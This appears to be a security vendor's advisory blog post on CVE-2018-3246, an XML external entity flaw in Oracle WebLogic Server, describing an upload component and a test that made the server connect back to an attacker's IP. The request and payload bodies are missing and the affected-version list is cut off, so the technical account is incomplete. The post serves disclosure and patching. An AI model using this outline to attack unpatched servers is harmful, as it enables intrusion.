Oracle WebLogic Server XML External Entity Vulnerability (CVE-2018-3246)

Oracle has addressed several WebLogic Server vulnerabilities this Patch Tuesday. In this post we will discuss one of the critical vulnerbilities, CVE-2018-3246. It’s an XML External Entity (XXE) vulnerability that affects Oracle WebLogic Server versions¬†, and

Vulnerability Analysis:

The vulnerability exists in a component that allows users to upload configuration files in an XML format. The server throws an error when a malformed XML is submitted.

Malformed Request

Let’s create a simple file upload form and submit the request to WebLogic server:


Let’s capture this request in BurpSuite. The server response confirms that it indeed tried to connect to attacking IP over port 443:

and we now have a connection from WebLogic server on our attacking IP:


An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary commands on the system. Customers are advised to scan their network for QID#87368 and QID#371264 to find vulnerable WebLogic Servers and apply appropriate patches.

Leave a Reply

Your email address will not be published. Required fields are marked *